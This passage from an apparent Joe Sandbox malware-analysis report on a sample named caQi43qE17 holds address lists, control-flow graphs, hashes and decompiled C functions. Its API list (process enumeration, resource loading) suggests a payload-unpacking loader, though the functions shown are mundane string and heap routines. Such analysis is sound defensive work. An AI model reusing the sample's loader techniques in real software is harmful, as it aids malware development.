                                                                                                                                                                                                    0x00402109
                                                                                                                                                                                                    0x0040210e
                                                                                                                                                                                                    0x00402113
                                                                                                                                                                                                    0x00402118
                                                                                                                                                                                                    0x0040211d
                                                                                                                                                                                                    0x00402122
                                                                                                                                                                                                    0x00402127
                                                                                                                                                                                                    0x0040212c
                                                                                                                                                                                                    0x00402131
                                                                                                                                                                                                    0x00402136
                                                                                                                                                                                                    0x0040213b
                                                                                                                                                                                                    0x00402140
                                                                                                                                                                                                    0x00402145
                                                                                                                                                                                                    0x0040214a
                                                                                                                                                                                                    0x0040214f
                                                                                                                                                                                                    0x00402154
                                                                                                                                                                                                    0x00402159
                                                                                                                                                                                                    0x0040215e
                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                    0x00402167
                                                                                                                                                                                                    0x0040216c
                                                                                                                                                                                                    0x00402171
                                                                                                                                                                                                    0x00402177
                                                                                                                                                                                                    0x00402179
                                                                                                                                                                                                    0x0040217c
                                                                                                                                                                                                    0x0040217e
                                                                                                                                                                                                    0x00402183
                                                                                                                                                                                                    0x00402188
                                                                                                                                                                                                    0x0040218f
                                                                                                                                                                                                    0x00402196
                                                                                                                                                                                                    0x0040219a
                                                                                                                                                                                                    0x0040219e
                                                                                                                                                                                                    0x004021a2
                                                                                                                                                                                                    0x004021a4
                                                                                                                                                                                                    0x004021bc
                                                                                                                                                                                                    0x004021be
                                                                                                                                                                                                    0x004021c0
                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                    0x004021e5
                                                                                                                                                                                                    0x004021ec
                                                                                                                                                                                                    0x004021f1
                                                                                                                                                                                                    0x00402213
                                                                                                                                                                                                    0x00402215
                                                                                                                                                                                                    0x00402217
                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                    0x00402239
                                                                                                                                                                                                    0x0040223b
                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                    0x00402243
                                                                                                                                                                                                    0x0040224d
                                                                                                                                                                                                    0x0040224f
                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                    0x00402260
                                                                                                                                                                                                    0x00402264
                                                                                                                                                                                                    0x00402269
                                                                                                                                                                                                    0x00402277
                                                                                                                                                                                                    0x0040227b
                                                                                                                                                                                                    0x00402286
                                                                                                                                                                                                    0x00402293
                                                                                                                                                                                                    0x004022af
                                                                                                                                                                                                    0x004022b1
                                                                                                                                                                                                    0x004022b5
                                                                                                                                                                                                    0x004022b7
                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                    0x004022d7
                                                                                                                                                                                                    0x004022e8
                                                                                                                                                                                                    0x004022ef
                                                                                                                                                                                                    0x004022f6
                                                                                                                                                                                                    0x00402300
                                                                                                                                                                                                    0x00402304
                                                                                                                                                                                                    0x00402308
                                                                                                                                                                                                    0x00402315
                                                                                                                                                                                                    0x0040231a
                                                                                                                                                                                                    0x0040231e
                                                                                                                                                                                                    0x00402324
                                                                                                                                                                                                    0x00402328
                                                                                                                                                                                                    0x0040232a
                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                    0x0040234e
                                                                                                                                                                                                    0x00402350
                                                                                                                                                                                                    0x00402352
                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                    0x0040235b
                                                                                                                                                                                                    0x0040235f
                                                                                                                                                                                                    0x00402361
                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                    0x0040236d
                                                                                                                                                                                                    0x00402371
                                                                                                                                                                                                    0x00402373
                                                                                                                                                                                                    0x00402375
                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x00402390
                                                                                                                                                                                                    0x00402396
                                                                                                                                                                                                    0x0040239c
                                                                                                                                                                                                    0x004023a0
                                                                                                                                                                                                    0x004023a2
                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                    0x004023ae
                                                                                                                                                                                                    0x004023b2
                                                                                                                                                                                                    0x004023b4
                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                    0x004023ce
                                                                                                                                                                                                    0x004023d1
                                                                                                                                                                                                    0x004023d3
                                                                                                                                                                                                    0x004023dd
                                                                                                                                                                                                    0x004023ec
                                                                                                                                                                                                    0x004023ef
                                                                                                                                                                                                    0x004023fe
                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                    0x00402403
                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                    0x00402417
                                                                                                                                                                                                    0x00402424
                                                                                                                                                                                                    0x00402426
                                                                                                                                                                                                    0x0040242a
                                                                                                                                                                                                    0x0040242c
                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                    0x0040243a
                                                                                                                                                                                                    0x0040243f
                                                                                                                                                                                                    0x00402443
                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                    0x0040244f
                                                                                                                                                                                                    0x0040245d
                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                    0x00402461
                                                                                                                                                                                                    0x00402462
                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                    0x0040246a
                                                                                                                                                                                                    0x0040246e
                                                                                                                                                                                                    0x00402470
                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                    0x0040247a
                                                                                                                                                                                                    0x0040247e
                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c55
                                                                                                                                                                                                    0x00401c62
                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                    0x00401c6a
                                                                                                                                                                                                    0x00401c6c
                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                    0x00401c77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c7b
                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                    0x00401c88
                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                    0x00401c98
                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                    0x00401cbd
                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                    0x00401cc5
                                                                                                                                                                                                    0x00401cc7
                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                    0x00401cd2
                                                                                                                                                                                                    0x00401cd4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cd6
                                                                                                                                                                                                    0x00401cd8
                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                    0x00401cdd
                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                    0x00401ce5
                                                                                                                                                                                                    0x00401ce8
                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cf9
                                                                                                                                                                                                    0x00401d02
                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                    0x00401d1d
                                                                                                                                                                                                    0x00401d22
                                                                                                                                                                                                    0x00401d25
                                                                                                                                                                                                    0x00401d27
                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                    0x00401d32
                                                                                                                                                                                                    0x00401d34
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d36
                                                                                                                                                                                                    0x00401d38
                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                    0x00401d3d
                                                                                                                                                                                                    0x00401d40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                    0x00401d45
                                                                                                                                                                                                    0x00401d48
                                                                                                                                                                                                    0x00401d4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d4a
                                                                                                                                                                                                    0x00401d40
                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                    0x00401d57
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d5d
                                                                                                                                                                                                    0x00401d6a
                                                                                                                                                                                                    0x00401d6f
                                                                                                                                                                                                    0x00401d72
                                                                                                                                                                                                    0x00401d74
                                                                                                                                                                                                    0x00401d80
                                                                                                                                                                                                    0x00401d80
                                                                                                                                                                                                    0x00401d82
                                                                                                                                                                                                    0x00401d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d86
                                                                                                                                                                                                    0x00401d88
                                                                                                                                                                                                    0x00401d9c
                                                                                                                                                                                                    0x00401d9c
                                                                                                                                                                                                    0x00401d8a
                                                                                                                                                                                                    0x00401d8a
                                                                                                                                                                                                    0x00401d8d
                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d92
                                                                                                                                                                                                    0x00401d92
                                                                                                                                                                                                    0x00401d95
                                                                                                                                                                                                    0x00401d98
                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                    0x00401da0
                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d57
                                                                                                                                                                                                    0x00401d50
                                                                                                                                                                                                    0x00401d52
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401dad
                                                                                                                                                                                                    0x00401db6
                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                    0x00401cf0
                                                                                                                                                                                                    0x00401cf2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                    0x00401c9d
                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                    0x00401c93
                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                    • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                    • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                    • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                    • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                    • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                    • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPNs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                    • API String ID: 2366190142-1649027716
                                                                                                                                                                                                    • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                    • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 188 2460490-24604d9 193 24604e5-24604e8 188->193 194 24604db-24604dd 188->194 195 24607f3-2460874 193->195 197 24604ee-246053c 193->197 194->195 196 24604e3 194->196 196->197 206 24605ae-2460618 197->206 207 246053e-2460570 197->207 226 2460631 206->226 227 246061a-246062f 206->227 216 2460572-2460574 207->216 217 246057c-246057f 207->217 216->195 218 246057a 216->218 217->195 220 2460585-24605a8 217->220 218->220 220->206 228 2460639 226->228 230 2460644-246065a 227->230 228->230 233 2460660-2460674 230->233 234 24606fd-2460719 230->234 237 2460676-246068c 233->237 238 24606ec-24606f0 233->238 242 2460790-24607c1 234->242 243 246071b-2460726 234->243 237->234 244 246068e-246069f LdrInitializeThunk 237->244 238->233 239 24606f6 238->239 239->234 257 24607eb-24607f2 242->257 247 2460750-2460788 243->247 248 2460728-246074e 243->248 249 24606a5-24606b4 244->249 264 246078e 247->264 248->247 255 24606b6-24606e2 249->255 256 24606e4-24606e8 249->256 255->234 256->244 259 24606ea 256->259 259->234 264->257
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                    • String ID: :p^
                                                                                                                                                                                                    • API String ID: 2994545307-1306112509
                                                                                                                                                                                                    • Opcode ID: f2e0d9a33b01cc24c83235807fea318c8cdc111c349944d205368869d578725c
                                                                                                                                                                                                    • Instruction ID: 9236cdc059c2cb048eb3d7554f250c478447da81786526fedbab0bd80bedc7ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2e0d9a33b01cc24c83235807fea318c8cdc111c349944d205368869d578725c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8B129387105108FC754DB39C998A2AB7F2FF88B14B2591A9E50ACB3B5DB31EC45CB81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __edx;
                                                                                                                                                                                                    				_t35 = _a4;
                                                                                                                                                                                                    				_t17 = __ecx;
                                                                                                                                                                                                    				if(_t35 != 0) {
                                                                                                                                                                                                    					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                    					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                    					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                    					asm("sbb esi, esi");
                                                                                                                                                                                                    					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                    					if(_t30 != 0) {
                                                                                                                                                                                                    						_t12 = GetLastError();
                                                                                                                                                                                                    						if(_t12 == 0x7a) {
                                                                                                                                                                                                    							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                    							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                    							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                    							asm("sbb esi, esi");
                                                                                                                                                                                                    							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t30 != 0) {
                                                                                                                                                                                                    							_t12 = E00401030();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *__ecx = _t35;
                                                                                                                                                                                                    					return __eax;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x004018f0
                                                                                                                                                                                                    0x004018f2
                                                                                                                                                                                                    0x004018f6
                                                                                                                                                                                                    0x004018fa
                                                                                                                                                                                                    0x00401917
                                                                                                                                                                                                    0x0040191a
                                                                                                                                                                                                    0x0040192f
                                                                                                                                                                                                    0x00401939
                                                                                                                                                                                                    0x0040193b
                                                                                                                                                                                                    0x0040193e
                                                                                                                                                                                                    0x00401940
                                                                                                                                                                                                    0x00401949
                                                                                                                                                                                                    0x0040195e
                                                                                                                                                                                                    0x0040196b
                                                                                                                                                                                                    0x00401980
                                                                                                                                                                                                    0x0040198a
                                                                                                                                                                                                    0x0040198c
                                                                                                                                                                                                    0x0040198c
                                                                                                                                                                                                    0x0040198f
                                                                                                                                                                                                    0x00401991
                                                                                                                                                                                                    0x00401991
                                                                                                                                                                                                    0x0040198f
                                                                                                                                                                                                    0x0040199a
                                                                                                                                                                                                    0x004018fc
                                                                                                                                                                                                    0x004018fc
                                                                                                                                                                                                    0x00401900
                                                                                                                                                                                                    0x00401900

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3322701435-0
                                                                                                                                                                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                    • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                    			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t40 = __edi;
                                                                                                                                                                                                    				_t28 = __ebx;
                                                                                                                                                                                                    				_t45 = _t51;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                    					if(_t14 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                    					__eflags = _t15;
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                    						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                    							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                    							__eflags =  *0x423490;
                                                                                                                                                                                                    							E0040AEFC(0x423484);
                                                                                                                                                                                                    							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                    						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                    						asm("int3");
                                                                                                                                                                                                    						_t47 = _t45;
                                                                                                                                                                                                    						_push(_t47);
                                                                                                                                                                                                    						_push(0xc);
                                                                                                                                                                                                    						_push(0x420ff8);
                                                                                                                                                                                                    						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                    						_t42 = _v4;
                                                                                                                                                                                                    						__eflags = _t42;
                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                    							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                    							if( *0x4250b0 != 3) {
                                                                                                                                                                                                    								_push(_t42);
                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E0040D6E0(_t28, 4);
                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                    								_t24 = E0040D713(_t42);
                                                                                                                                                                                                    								_v40 = _t24;
                                                                                                                                                                                                    								__eflags = _t24;
                                                                                                                                                                                                    								if(_t24 != 0) {
                                                                                                                                                                                                    									_push(_t42);
                                                                                                                                                                                                    									_push(_t24);
                                                                                                                                                                                                    									E0040D743();
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_v16 = 0xfffffffe;
                                                                                                                                                                                                    								_t19 = E0040B70B();
                                                                                                                                                                                                    								__eflags = _v40;
                                                                                                                                                                                                    								if(_v40 == 0) {
                                                                                                                                                                                                    									_push(_v4);
                                                                                                                                                                                                    									L16:
                                                                                                                                                                                                    									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                    										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                    										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						return E0040E21D(_t19);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    				goto L19;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x0040af66
                                                                                                                                                                                                    0x0040af66
                                                                                                                                                                                                    0x0040af69
                                                                                                                                                                                                    0x0040af7d
                                                                                                                                                                                                    0x0040af80
                                                                                                                                                                                                    0x0040af88
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040af73
                                                                                                                                                                                                    0x0040af79
                                                                                                                                                                                                    0x0040af7b
